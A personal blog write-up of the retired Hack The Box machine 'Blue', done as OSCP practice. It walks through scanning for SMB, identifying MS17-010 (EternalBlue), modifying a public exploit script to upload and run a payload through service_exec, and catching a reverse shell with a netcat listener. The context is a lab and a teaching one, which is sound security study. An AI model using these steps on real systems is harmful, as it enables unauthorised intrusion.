Road to OSCP : HTB Series : BLUE
In my road to OSCP certification, one of the common to-dos as many before have done in preparation for the exams was to take on the retired machines available in Hack in The Box (HTB) platform. This platform is a great platform for practicing and learning new penetration testing skills as well as taking on the challenge of “capturing the flag” on their machines.
In this HTB series, I will be sharing my write-ups on all the retired machines that I have and will attempt. If you are wondering, “How does he know which machine to do to prepare for OSCP?” Well, I am using TjNull list of OSCP-like boxes in HTB which can be found here
Now, without boring you with the details, let’s start!
The first box I will be walking through is a simple one, BLUE. Some interesting fact about Blue is that it is one of those boxes where a single exploit will bring you to root. This usually should never happen in the real world and it only shows how this particular exploit (The clue is in its name) is eventually used as a vector for one of the famous ransomware, WannaCry.
To begin with this box, we first carry out our basic Reconnaissance. For me, I used AutoRecon which is developed and scripted by Tib3rius. It is one of my fundamental scans I make before moving on to more manual enumeration for specific ports or applications. After running the AutoRecon, I checked the result of a quick nmap scan of the box
We see there are really a lot of ports open for us to look at. While this may seem intimidating, but with practice, you will realise that you will learn how to look for common ports for common stuff first and in this case for me, I saw that port 139 and 445 is open. This tells me that SMB is open here.
With this, I then run Nmap using the NSE scripts available:
Bingo. The NSE Script picked up on an interesting RCE Vulnerability! A quick Google FU on this CVE or the MS17–010 code will tell us that this is indeed about the SMB Vulnerability that EternalBlue was used.
Using Searchsploit to search up the term EternalBlue:
We see that there are 3 options for us to choose from. Based on our initial Reconnaissance, we know that our machine is probably Windows 7 or Windows Server 2008 R2. It is a good guess but we still do not know for sure. To be on the safe side, I chose 42315.py exploit to use. Grabbing that exploit with:
```searchsploit -m windows/remote/42315.py```
There is a Metasploit framework module that we could use but nope, let’s try this manually. First, we need to modify 42315.py as follows:
We modify the username to add two backslashes is to login as guest login since guest login is enabled on the SMB service. We then modify the chunk of the python script that does the execution of exploit.
smb_pwn original purpose is to create a pwned.txt file on the target. However we want to extend this to gain a shell. To do that we added the following code under the
smb_send_file(smbConn, “<path to your exploit.exe>”, ‘$C’, ‘/blue.exe’)service_exec(conn, r’cmd /c C:\\blue.exe’)
In doing so, we utilise the
smb_send_file function in the script to load a .exe file that we will craft that when executed will give us a reverse shell on our listener. We then utilise the function
service_exec in the script to execute the blue.exe we have loaded onto the machine.
Then using msfvenom, we generate our malicious binary that will give reverse shell when executed:
We then run the python exploit 42315.py as follow with another tab running
nc -lvnp 4444
Checking on our listener after running the python exploit:
We have managed to successfully obtained root and captured the root.txt flag!
Albeit this is an easy box, there are some stuff that we can learn from this box. If you took the Metasploit Framework route, while it is really easy, you will lose the chance and joy of learning how to read publicly available exploit and manipulate the exploit as per your desire.
It also highlights how it is especially important to secure any services or applications that we are opening up ports to the wild, especially more so if these services or applications are running with privileges, meaning root.
The mitigation for this vulnerability can be read more from here
Thank you for reading! And like always if you enjoy this write-ups, subscribe to my publications or follow me on twitter @lojomojo96 and hit me up with a DM! It will really encourage me to write and share even as I prepare for my OSCP Certification. Of course, if there are points to improve upon my own methodology, do let me know too!